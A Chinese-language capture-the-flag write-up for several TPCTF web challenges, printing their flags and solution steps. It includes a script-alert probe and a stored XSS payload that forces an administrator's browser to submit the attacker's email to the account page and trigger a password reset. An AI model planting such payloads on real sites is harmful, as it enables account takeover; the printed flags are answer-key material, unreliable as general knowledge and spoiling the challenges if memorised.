TPCTF-WEBwriteup

发表于 | 分类于 | | 阅读次数

这题巨坑

提示说从本站找,翻了翻功能,发现一个/about页面,然而并没有啥东西,后来根据题目ad脑洞把火狐的adblock关了,得到flag

1
tpctf{thx_4_n0_adb1ock}

method

这题也入坑了好久
题目说要找到一个使服务器产生问题的page,就可以得到flag

访问problem提示说flag不在这里
结果试了各种爆错和扫描器,最后冷静下看题目提示是method于是试了一遍methos
get,post,put,options,delete
在delete的时候发现了flag

3.What is this place?
一打开是个这样的页面

根据提示加一句话

1
<script>alert(window.location)</script>


再根据提示截取前16个字符访问得到flag

1
tpctf{w4i7_r3pl_d03s_7h15?}

Management

打开是个注册页面,注册一个pupiles用户后进入,进入后逻辑大概是这样的

create会把数字和value一起插入到数据库,read会把相应的sql语句和返回结果(上一步的value)打印出来。
这里本来以为是二次注入,没想到随手一试直接出了flag…(迷

It’s Common Sense

进去给了一个站,浏览了一下大概有如下几个功能

  1. 重置密码,会给你输入的邮箱发送一封重置密码的邮件
  2. 提交产品评论

    看到这里,大概明白了如何下手了,csrf+重置管理员密码
    在产品评论处提交xsspayload
    1
    2
    3
    4
    5
    6
    <script>
    var payload = new XMLHttpRequest();
    payload.open("POST", "https://commonsensereviews.tpctf.tk/account", false);
    payload.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    payload.send("email=你的邮箱地址&formbtn=Send+Request");
    </script>

这样就可以收到邮件

1
2
3
4
5
Reset Your Password

Congratulations! Normally, you would've reset the administrators password.
For the purposes of this challenge,
the flag is tpctf{D1D_Y0U_N0t1c3_Common_Sense_Reviews_1s_P4R7_0F_CSRF_19210jka010920aff}